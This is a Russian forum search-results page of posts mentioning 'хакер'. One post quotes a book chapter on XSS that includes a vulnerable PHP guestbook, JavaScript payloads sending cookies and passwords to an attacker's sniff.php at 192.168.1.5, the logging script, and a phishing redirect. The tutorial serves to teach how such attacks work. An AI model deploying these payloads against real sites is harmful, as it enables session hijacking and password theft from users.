Сообщения со словом
«хакер»

11. 19.08.2008, 19:37. DWORD в теме
    «Кибервойна с преподавателем. Взлом УМа….»
    ... преспокойно живут и здравствуют на воле в реальности хакеров если понимать под ними веб-взломщиков в россии никто не ловит не потому что они пользуются впнами проксями и т д и т п логи ведутся и на проксях на этих и на шлюзах через которые эти прокси подключены если соединение не шифруются то есть такие системы как копм и копм2 на самом деле копм2 умеет слушать даже шифрующиеся соединения отравляя обмен ключами но такая система на сколько я знаю применяется только уже к конкретному подозреваемому хосту при помощи которых можно обойтись даже без восстановления цепочек прокси если речь идет о впн то его обычно аки презерватив не меняют и пользуются достаточно долго если поиметь контакт с сервером на котором хостится впн это можно сделать с помощью уязвимостей в этом сервере закрытых 0day или публичных с помощью контакта с админами шлюзов самого этого сервера серверной площадки в конце концов по официальному запросу если речь идет о российском сервере или есть какие-то договоренности и правила сотрудничества со страной где находится сервер в любом случае самый длительный и лобовой способ следующий ip в цепочке серверов посредников уже в кармане справедливости ради стоит отметить что сегодняшние обнаглевшие от безнаказанности хакеры длинные цепочки не выстраивают кроме того с помощью анализа логов и выяснения мотива преступления можно собрать статистику по логам м атакованной системы и других систем которые потенциально могли быть атакованы по этим же мотивам статистика поможет выявить другие прокси сервера которые точно так же можно отработать бывает так что даже громкие взломы изначально прощупывались чуть ли вообще не со своего ip когда атакующий даже не подозревал о том что что-то из этого получится так вот хакеров не ловят не потому что они неуловимы а потому что все взломы можно разделить на две категории обе из которых дают хакеру иммунитет а уязвим хакер оказывается лишь где-то на тонкой границе стыка этих категорий первая категория взлом никому ненужных систем сайтов таких что ущерб от взлома минимален ресурсы на восстановление нулевые таких взломов большинство даже если администратор соберется с духом заморочиться на тему того чтобы наказать преступника он столкнется непреодолимым сопротивлением следствия которым такой фигней заниматься совсем даже не хочется придется потратить кучу денег только на то чтобы возбудили дело а уж чтобы довести его до суда и выигать вообщем те деньги время нервы которые тут понадобятся могли бы с легкостью окупить еще десяток таких систем как та что была взломана вторая группа серьезные проекты взлом которых грозит убытками в тысячи десятки тысяч и сотни тысяч долларов тут возникает другая проблема возбуждение уг дела по факту взлома может очень серьезно подмочить репутацию компании которая фактически расписывается в своей беззащитности перед хакерами ставя под удар инвесторов вкладчиков и т д в зависимости от проекта в итоге дело может обернуться куда более серьезными потерями для компании чем тот убыток который потенциально мог бы нанести взломщик а тем более чем тот который он реально нанесет увы такова реальность компьютерных преступлений если кто-то ловит хакеров то это либо совсем начинающие дети которых так поперло от своей крутости что они надефейсили добрых несколько тысяч сайтов либо хакеры чей взлом обернулся скандалом вокруг какой-то...
12. 18.08.2008, 18:15. Lexxus в теме
    «Кибервойна с преподавателем. Взлом УМа….»
    век живи век учись оказывается хакер это человек попросивший пароль у админа в случае...
13. 18.08.2008, 17:58. VAL в теме
    «Кибервойна с преподавателем. Взлом УМа….»
    ... сохранил командный дух и однажды заметил что студенты-хакеры очень хотели бы угробить сайт препа просили дать доступ админа но барсум отказался спасибо а еще как-то заметил что уровень квалификации последующих поколений низок имхо не у всех есть очень высокий вполне потребный чтобы стать сисадмином ну особенно когда за это платят приличные деньги еще пример админ-студент создал ум для сайта препа на втором курсе но на пятом не появился отчислен к моему великому сожалению не справился с собственным умом и программой обучения в мифи другой админ 2-й курс отличный программист но иногда бывал очень наивен когда студент-хакер попросил админский доступ от моего имени дал хотя я и не просил да и встречаемся мы с студентами-админами еженедельно можно не спешить и все уточнить при личном контакте с препом хакер конечно порезвился а этот студент получил админский урок имхо полезный сайт живет по-прежнему в общем примеров есть много а технологий админской игры препа со студентами у которого есть сайт в инете тоже 7 августа сайт препа валинфо подвергся удачной хакерской атаке см иллюстрацию имхо это не последняя...
14. 17.07.2008, 22:11. ~Ironia~ в теме
    «XSS - атаки в комметариях»
    фленов м е ф69 web-сервер глазами хакера спб бхв-петербург 2007 288 с ил isbn 5-94157-913-6 xss-------------------- в последнее время очень много разговоров было о том нужны ли файлы cookies или нет да они позволяют сохранять web-сайтам информацию на компьютере пользователя и потом использовать ее для предоставления персонализированного содержимого web-страниц в главе 9 мы уже видели что одним из способов использования cookies является хранение имени пользователя и пароля для осуществления последующего автоматического входа в большинстве случаев это очень удобно но далеко не безопасно меня не волнует что web-сайты могут сохранять в таких файлах информацию о том какие web-страницы я просматривал и чем я интересуюсь эту информацию можно сохранить и без cookies меня волнует то что эти данные может увидеть хакер один из способов воровства атака xss для реализации этой атаки хакеру необходимы базовые знания языка javascript этот язык очень прост и на первый взгляд абсолютно безобиден потому что не имеет доступа к ресурсам компьютера единственное что можно делать с помощью javascript управлять браузером но для хакера этого достаточно главное внедрить свой javascript код в web-страницу а дальше уже действовать по ситуации а ситуации бывают разные их изучением мы и займемся в этой главе ---------------------10 1 основы xss------------------- опять же все примеры сценариев в этой главе будут приведены на php почему повторюсь просто я его лучше знаю но это не значит что если сценарий написан на другом языке атака будет невозможной чаще всего xss подвержены web-сайты в которых используется аутентификация посредством данных хранящихся в cookies и есть возможность сохранять данные которые в дальнейшем будут отображаться на web-странице ярким примером такого web-сайта является форум давайте рассмотрим простейший пример использования уязвимости в листинге 10 1 приведен код сценария который отображает форму для ввода имени пользователя и текста сообщения полученные данные сохраняются в базе данных и отображаются на web-странице получается классическая гостевая книга листинг 10 1 html head title xss test title head body center h3 xss test h3 center hr form name messageadd method get имя input name username size 50 br сообщение textarea cols 65 name message rows 10 wrap virtual textarea br center center input type submit value send center form hr php соединение с базой данных mysql connect localhost root wf or die he могу подключиться к web-серверу выбор базы данных mysql select db udb539 or die he могу выбрать базу данных добавляем сообщение if isset get username username get username message get message result mysql query insert into nest news values null 1 1 1 username message 1 1 1 отображаем сообщения из базы result mysql query select poster name post text from minibbtable posts if mysql num rows result 0 print table width 100 border l print tr bgcolor aalblb print td font color ffffff user font td print td font color ffffff message font td print tr tr получаем результат запроса while line mysql fetch array result mysql assoc print tr print td line poster name td print td line post text td print tr print table body html he будем сейчас обращать внимание на то что в сценарии есть еще и ошибка позволяющая реализовать sql-инъекцию ведь получаемые от пользователя данные никак не проверяются нас сейчас интересует совершенно другое итак если пользователь просто оставляет текст сообщения то никаких проблем нет а что если в текст сообщения будет встроен javascript-код он будет выполнен а это серьезная уязвимость попробуем передать в тексте сообщения или имени пользователя строку script alert this is a test script эта строка является javascript-кодом который выводит на экран диалоговое окно с сообщением this is a test рис 10 1 рис 10 1 окно браузера с сообщением пока ничего страшного не произошло но предпосылки опасности уже есть первое что может натворить хакер сделать перенаправление на свою web-страницу для этого в тексте сообщения отправим следующий javascript-код script document location href http www vr-online ru script теперь при загрузке web-страницы пользователь будет перенаправлен на web-сайт указанный хакером в данном случае www vr-online ru как это можно использовать в корыстных целях помимо того что хакер получает трафик с чужого web-сайта он еще может украсть и пароли для этого можно создать web-страницу которая будет копией одной из страниц web-сайта трафик с которого воруется лучше будет создать web-страницу регистрации и попросить пользователя ввести имя и пароль заново для правдоподобности можно добавить сообщение об ошибке как будто произошел сбой авторизации ничего не подозревающий пользователь введет данннные которые будут сохранены в базе данных хакера после этого следует перенаправить пользователя туда откуда он пришел 2 10 2 перехватываем данные итак давайте сейчас посмотрим как хакер может перехватить данные пользователя например допустим что хакер добавит на форум или гостевую книгу следующий javascript-код script document location href http 192 168 1 5 sniff php test script этот код переадресует нас на web-страницу http 192 168 1 5 sniff php а в качестве параметра для примера передается слово test сценарий sniff php это программа хакера которая просто сохраняет переданный url в каком-нибудь хранилище например в текстовом файле пример такого файла может быть следующим php f fopen snif txt а fwrite f requbst ori fclose f print ok в этом примере содержимое url сохраняется в текстовом файле snif txt в нашем случае в этот файл попадет следующая строка sniff php test пока вроде ничего страшного хакер сам себе отправил сообщение test и web-сайт пока не пострадал усложняем задачу допустим что в форме отправки сообщения есть невидимое поле passws через которое передается пароль input type hidden name passws value qwerty каждый пользователь видит свой пароль а чтобы увидеть чужой необходимо его перехватить для этого хакер может внедрить на форму следующий javascript-код script document location href- httpi 192 168 1 5 sniff php document message passw value script в этом примере файлу sniff php передается содержимое невидимого поля теперь в файле snif txt хакер будет собирать пароли добропорядочных пользователей и возможно что на удочку попадется и администратор но вероятность найти подобный сценарий стремится к нулю намного чаще пароли хранятся в cookies но и их украсть не проблема достаточно только внедрить на форму следующий код script document location href http 192 168 1 5 sniff php document cookie script благодаря тому что javascript имеет доступ к cookies мы без проблем можем отправить их своему сценарию допустим что в самом начале нашего сценария в cookies устанавливаются следующие два значения php setcookie user admin time 5184000 setcookie pass qwerty time 5184000 теперь после их перехвата в файле snif txt мы увидим следующее sniff php user admin 20pass qwerty вот так вот хакеры с помощью xss воруют пароли единственный недостаток всех примеров которые описаны выше они перенаправляют пользователя на web-страницу хакера это не очень хорошо потому что пользователь может заподозрить что-то неладное но хакеры нашли более незаметный способ script img new image img src http 192 168 1 5 sniff php document cookie script секрет прост мы просто создаем изображение и присваиваем ему в качестве адреса наш сценарий да это неправильно ведь сценарий не является изображением но этот метод работает при желании даже можно переименовать файл sniff php в sniff gif от этого ничего не изменится теперь у хакера есть имя и хеш пароля если на web-сайте разрешен автоматический вход то нет необходимости даже подбирать пароль дело в том что хакер может просто подменить свои cookies перехваченными и зайти на web-сайт без какой-либо авторизации вот так вот просто и красиво хакер может осуществить взлом
15. 27.06.2008, 01:29. M2b в теме
    «Чему учат на Б факультете?»
    ... разные люди это достаточно известный компьютерщик и хакер у него много публикаций в виде книг их более...
16. 11.05.2008, 22:27. DWORD в теме
    «Голова болит из-за поступления»
    имхо в хакерский целях сегодня нужны знания в области программирования микропроцессоров причем современных знания архитектур операционных систем причем современных сетей от их организации и железяк в них участвующих до протоколов на всех ступеньках osi кроме того никак не обойтись без навыков реверсирования здоровенных ассемблерных листингов отладки хитров банных антиотладочных алгоритмов и виртуальных машин а это целая наука со своими классическими трюками и приватными финтами и никакая это не криптология и не криптоанализ кроме того профейссиональный хакер специализирующийся допустим на windows давно уже изучает исходные коды этой ос которые на самом деле не должны быть ему доступны и поэтому не могут быть освещены в институтском курсе не могу утверждать но мне кажется что даже реверсирование внутренних интерфейсов windows запрещено о чем тогда вообще в этой области рассказывать студентам во всяком случае 99 99 того что сегодня относят в категорию хакерства к математике имеет весьма посредственное отношение ни один хакер решая практическую задачу не будет пытаться взломать...
17. 06.03.2008, 21:00. asterix20 в теме
    «Процесс iexplore.exe»
    ... ну да слабо как описал но голова не работает вообще хакер не занимается вирусописательством этим занимаются...
18. 06.03.2008, 20:42. mrAndersen в теме
    «Процесс iexplore.exe»
    ... нас я незнаю как тебе еще объяснить очевидные вещи хакер когда вирус пишет он делает это с какой-то целью...
19. 15.11.2007, 20:44. Румата в теме
    «Выборы в Государственную Думу - 07.»
    ... драться в бойцовском клубе патриот интеллигент-радикал хакер имперец националист левый или правый философ...
20. 08.07.2007, 00:35. GALAHAD1 в теме
    «Ассоциации»
    негр-хакер ассоциация как только что посмотревшего фильм...